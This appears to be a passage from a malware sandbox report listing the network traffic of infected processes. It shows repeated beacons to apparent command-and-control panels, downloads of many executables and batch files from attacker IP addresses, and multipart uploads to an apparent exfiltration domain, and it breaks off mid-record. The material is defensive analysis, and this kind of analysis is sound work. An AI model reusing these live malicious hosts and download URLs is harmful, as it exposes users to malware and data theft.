Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 13:59:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 13:59:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 13:59:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 13:59:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 13:59:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 13:59:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 13:59:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 13:59:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 14:00:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 14:00:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 14:00:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 14:00:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 14:00:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 14:00:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 14:00:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 14:00:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://185.215.113.16/test/amnew.exe

rapes.exe

Remote address:

185.215.113.16:80

Request

GET /test/amnew.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 13:58:43 GMT
Content-Type: application/octet-stream
Content-Length: 439296
Last-Modified: Thu, 30 Jan 2025 18:34:28 GMT
Connection: keep-alive
ETag: "679bc634-6b400"
Accept-Ranges: bytes
POST

http://185.215.113.209/Di0Her478/index.php

futors.exe

Remote address:

185.215.113.209:80

Request

POST /Di0Her478/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.209
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 13:58:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.209/Di0Her478/index.php

futors.exe

Remote address:

185.215.113.209:80

Request

POST /Di0Her478/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.209
Content-Length: 156
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 13:58:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.209/Di0Her478/index.php

futors.exe

Remote address:

185.215.113.209:80

Request

POST /Di0Her478/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.209
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 13:59:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.209/Di0Her478/index.php

futors.exe

Remote address:

185.215.113.209:80

Request

POST /Di0Her478/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.209
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 13:59:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://176.113.115.7/test/exe/random.exe

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /test/exe/random.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:58:54 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 29 Mar 2025 13:17:59 GMT
ETag: "eaa00-6317b041961c2"
Accept-Ranges: bytes
Content-Length: 961024
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/test/am_no.bat

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /test/am_no.bat HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:58:59 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 03 Mar 2025 16:26:04 GMT
ETag: "7d9-62f729cd13f00"
Accept-Ranges: bytes
Content-Length: 2009
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/files/7001656225/Rm3cVPI.exe

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /files/7001656225/Rm3cVPI.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:03 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 28 Mar 2025 09:12:13 GMT
ETag: "58800-63163774f5cc4"
Accept-Ranges: bytes
Content-Length: 362496
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/files/rast333a/random.exe

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /files/rast333a/random.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 29 Mar 2025 13:29:13 GMT
ETag: "211000-6317b2c4036bc"
Accept-Ranges: bytes
Content-Length: 2166784
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/files/7033027882/TbV75ZR.exe

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /files/7033027882/TbV75ZR.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:15 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 28 Mar 2025 17:35:14 GMT
ETag: "f7c00-6316a7e364866"
Accept-Ranges: bytes
Content-Length: 1014784
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/files/6691015685/hYjiwV0.exe

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /files/6691015685/hYjiwV0.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:21 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 29 Mar 2025 09:42:06 GMT
ETag: "9e800-63177ffffe481"
Accept-Ranges: bytes
Content-Length: 649216
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/files/8104437623/EPTwCQd.exe

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /files/8104437623/EPTwCQd.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:26 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 28 Mar 2025 10:23:36 GMT
ETag: "b2028-63164769fe274"
Accept-Ranges: bytes
Content-Length: 729128
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/files/5163778194/7IIl2eE.exe

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /files/5163778194/7IIl2eE.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:31 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Wed, 26 Mar 2025 03:27:42 GMT
ETag: "1290e9-631366b83351c"
Accept-Ranges: bytes
Content-Length: 1216745
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/files/1781548144/8BNn7ce.bat

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /files/1781548144/8BNn7ce.bat HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 29 Mar 2025 13:29:35 GMT
ETag: "15e268-6317b2d8ff687"
Accept-Ranges: bytes
Content-Length: 1434216
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/files/teamex_support/random.exe

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /files/teamex_support/random.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:42 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 29 Mar 2025 13:18:21 GMT
ETag: "1c9200-6317b05638410"
Accept-Ranges: bytes
Content-Length: 1872384
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/luma/random.exe

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /luma/random.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:49 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 29 Mar 2025 13:19:11 GMT
ETag: "2d2c00-6317b085d3905"
Accept-Ranges: bytes
Content-Length: 2960384
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/steam/random.exe

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /steam/random.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:57 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 29 Mar 2025 13:19:40 GMT
ETag: "1c1600-6317b0a13e024"
Accept-Ranges: bytes
Content-Length: 1840640
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/well/random.exe

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /well/random.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:04 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 29 Mar 2025 13:18:06 GMT
ETag: "ecc00-6317b04857933"
Accept-Ranges: bytes
Content-Length: 969728
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/off/random.exe

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /off/random.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:09 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 29 Mar 2025 13:18:43 GMT
ETag: "19fa00-6317b06b97d92"
Accept-Ranges: bytes
Content-Length: 1702400
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/files/martin2/random.exe

futors.exe

Remote address:

176.113.115.7:80

Request

GET /files/martin2/random.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:58:56 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 29 Mar 2025 13:23:31 GMT
ETag: "45f600-6317b17e23e90"
Accept-Ranges: bytes
Content-Length: 4584960
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/files/unique2/random.exe

futors.exe

Remote address:

176.113.115.7:80

Request

GET /files/unique2/random.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:09 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 29 Mar 2025 12:59:10 GMT
ETag: "469a00-6317ac0c65d53"
Accept-Ranges: bytes
Content-Length: 4626944
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/mine/random.exe

powershell.exe

Remote address:

176.113.115.7:80

Request

GET /mine/random.exe HTTP/1.1
Host: 176.113.115.7
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:58:57 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 29 Mar 2025 13:18:14 GMT
ETag: "1c6400-6317b04fd38f9"
Accept-Ranges: bytes
Content-Length: 1860608
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/mine/random.exe

powershell.exe

Remote address:

176.113.115.7:80

Request

GET /mine/random.exe HTTP/1.1
Host: 176.113.115.7
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:03 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 29 Mar 2025 13:18:14 GMT
ETag: "1c6400-6317b04fd38f9"
Accept-Ranges: bytes
Content-Length: 1860608
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

galarona.bet

Rm3cVPI.exe

Remote address:

8.8.8.8:53

Request

galarona.bet

IN A

Response
DNS

oreheatq.live

5cf0a9b56c.exe

Remote address:

8.8.8.8:53

Request

oreheatq.live

IN A

Response

oreheatq.live

IN A

172.67.172.183

oreheatq.live

IN A

104.21.30.96
POST

https://oreheatq.live/gsopp

Rm3cVPI.exe

Remote address:

172.67.172.183:443

Request

POST /gsopp HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 59
Host: oreheatq.live

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iuyfpiMxYzr43RK5qwl3NivrP8Q1lifMf9OQwaINsy8fT8y%2FLPwRJpIhyHrCxTBlSqOZc53lo%2FFFQkCVkCRjogzzJctx%2BfN4F%2BrQmnkhrqsa6Eh9bQlEMZvHqUuOH%2B3x"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927fe2d67fd5fd92-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=48968&min_rtt=43728&rtt_var=18914&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=629&delivery_rate=80403&cwnd=253&unsent_bytes=0&cid=ddbf2f7cc9e1b5f3&ts=267&x=0"
POST

https://oreheatq.live/gsopp

Rm3cVPI.exe

Remote address:

172.67.172.183:443

Request

POST /gsopp HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=UjWhC4blS6bbUOpS3r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 1517
Host: oreheatq.live

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aSotAzlAQM%2FEX7FDz89FiVE7uzJhsu4n7TNn21A2MD2ewPMzKhb1XBcBs0LsIn2QnElc7EkZ2Kml%2FTXU84sedwsX55J1l%2FOsSrogKZdIY%2BTZuT3TJiPHeVvy5WyXJ0u7"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927fe2d80b58fd92-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=48677&min_rtt=43728&rtt_var=14767&sent=10&recv=11&lost=0&retrans=0&sent_bytes=3803&recv_bytes=2495&delivery_rate=80403&cwnd=255&unsent_bytes=0&cid=ddbf2f7cc9e1b5f3&ts=472&x=0"
POST

https://oreheatq.live/gsopp

Rm3cVPI.exe

Remote address:

172.67.172.183:443

Request

POST /gsopp HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=GE37A87h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 1048
Host: oreheatq.live

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kx54RZIHPWp6WTW4Kwv5VXG1FqW8SBrGOFzpoGUXeBmmi%2B01vVe%2BW3lddF6pl7W2zOg3GI%2F5ENtIlVPGwf0DhTINAGHmaYDs3QSGnE2599mORnXvLFt6qgur7h%2FlSKji"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927fe2dafaef9545-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47075&min_rtt=44794&rtt_var=11103&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1637&delivery_rate=80417&cwnd=253&unsent_bytes=0&cid=1f8a2bc8cdc8dc64&ts=216&x=0"
GET

http://185.156.73.98/success?substr=mixfour&s=three&sub=none

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /success?substr=mixfour&s=three&sub=none HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:15 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/info

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /info HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:26 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 21
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/update

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /update HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:26 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Disposition: attachment; filename="fuckingdllENCR.dll";
Content-Length: 99856
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:27 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:29 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:31 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:33 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:35 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

